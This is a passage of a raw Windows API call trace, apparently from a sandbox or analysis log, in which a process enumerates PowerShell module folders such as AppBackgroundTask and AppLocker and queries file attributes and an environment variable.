cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0226.013] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0226.013] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0226.014] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0226.014] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0226.014] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0226.014] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0226.014] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0226.015] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0226.015] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5f0) returned 1 [0226.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5b0) returned 1 [0226.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.015] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0226.015] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0226.015] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf970 [0226.016] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.016] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0226.017] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0226.017] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.017] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0226.017] FindNextFileW (in: hFindFile=0x1a5cf970, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0226.017] FindClose (in: hFindFile=0x1a5cf970 | out: hFindFile=0x1a5cf970) returned 1 [0226.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.018] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0226.018] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0226.018] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.018] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.018] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0226.018] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0226.018] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.019] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0226.019] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.019] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.020] CoTaskMemAlloc (cb=0x20e) returned 0x5e1bc0 [0226.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5e1bc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0226.020] CoTaskMemFree (pv=0x5e1bc0) [0226.022] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0226.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.022] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.023] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0226.023] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0226.023] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf790 [0226.023] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.023] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0226.024] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0226.024] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.024] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0226.024] FindNextFileW (in: hFindFile=0x1a5cf790, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0226.024] FindClose (in: hFindFile=0x1a5cf790 | out: hFindFile=0x1a5cf790) returned 1 [0226.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.025] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0226.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.026] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0226.026] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0226.026] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.026] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.026] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0226.027] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0226.027] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.027] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0226.027] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0226.027] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf7f0 [0226.028] FindNextFileW (in: 